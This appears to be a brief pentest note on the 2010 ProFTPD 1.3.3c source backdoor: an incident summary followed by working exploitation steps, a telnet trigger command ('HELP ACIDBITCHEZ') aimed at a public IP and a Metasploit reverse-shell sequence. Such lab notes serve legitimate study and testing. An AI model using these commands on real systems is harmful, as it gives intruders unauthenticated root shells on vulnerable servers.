proftpd-1.3.3c-backdoor

Theory

On Sunday, the 28th of November 2010 around 20:00 UTC the main distribution server of the ProFTPD project was compromised. The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server and used their privileges to replace the source files for ProFTPD 1.3.3c with a version which contained a backdoor. The unauthorized modification of the source code was noticed by Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on Wednesday, December 1 and fixed shortly afterwards.

Anyone who downloaded ProFTPD 1.3.3c from one of the official mirrors from 2010-11-28 to 2010-12-02 will most likely be affected by the problem. The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon.


Practical

Telnet

telnet 163.172.229.5 21

HELP ACIDBITCHEZ

id;

Metasploit

use exploit/unix/ftp/proftpd_133c_backdoor

set PAYLOAD generic/shell_reverse_tcp

set LHOST 192.168.100.18

set RHOST 192.168.100.20

exploit


REFERENCES

Last updated